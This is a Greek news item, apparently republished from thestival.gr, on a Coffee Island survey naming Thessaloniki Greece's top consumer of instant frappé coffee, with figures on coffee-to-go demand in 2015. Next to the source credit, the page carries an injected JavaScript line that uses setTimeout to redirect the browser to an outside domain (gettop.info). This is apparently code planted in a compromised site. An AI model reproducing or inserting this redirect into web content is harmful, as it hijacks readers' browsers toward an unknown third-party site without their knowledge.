Πρώτη στην Ελλάδα σε κατανάλωση φραπέ η Θεσσαλονίκη

0
17

 

Φραπεδούπολη και με τη βούλα είναι η Θεσσαλονίκη, καθώς σύμφωνα με έρευνα είναι η πρώτη σε κατανάλωση στιγμιαίου καφέ (και ζεστού και κρύου) σε ολόκληρη την Ελλάδα.

Αυτό προκύπτει από έρευνα που διενήργησε σε όλη την χώρα, η αλυσίδα καταστημάτων καφέ, Coffee Island.

Η πρωτιά αυτή μπορεί να εξηγηθεί εύκολα καθώς η Θεσσαλονίκη θεωρείται μητέρα του φραπέ.

Βέβαια σύμφωνα με την ίδια έρευνα ο στιγμιαίος καφές έχει αρχίσει να πέφτει σε ζήτηση και να ανεβαίνει η κατανάλωση της κατηγορίας espresso (πχ cappuccino, espresso, freddo κλπ). Σε πρόσφατη έρευνα η κατηγορία espresso ξεπέρασε σε κατανάλωση την κατηγορία στιγμιαίου (αλλά σε πολύ πιο αργό ρυθμό σε σχέση με την υπόλοιπη Ελλάδα).

Παράλληλα σε έρευνες που έχει πραγματοποιήσει η Coffee Island ανά την Ελλάδα για να διαπιστώσει τις καταναλωτικές συνήθειες της ελληνικής αγοράς γύρω από το Coffee To Go, για τη Θεσσαλονίκη υπάρχει αύξηση στη ζήτηση ετοίμων ροφημάτων (καφέ, τσάι και λοιπών ροφημάτων) από 67,3% τον Φεβρουάριο του 2015 σε 73,1% το Δεκέμβριο του 2015.

Από αυτό διαπιστώνεται ότι:

Η αύξηση σε ποσοστό είναι 8% ( και πλέον φαίνεται ότι η αγορά τη Θεσσαλονίκης ακολουθεί το μέσο όρο της Ελλάδας και σε συνολικό ποσοστό (72,9%) αλλά και σε ρυθμούς ανάπτυξης.

Κατά την παρουσίαση της Coffee Island στην 32η Philoxenia στη ΔΕΘ, ως ένα case study για να εξηγηθεί η αλματώδης εξέλιξη του κλάδου του Coffee To Go, η Θεσσαλονίκη έχει τρομακτική αύξηση ζήτησης για συνεργασία.

 

Πηγή: thestival.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here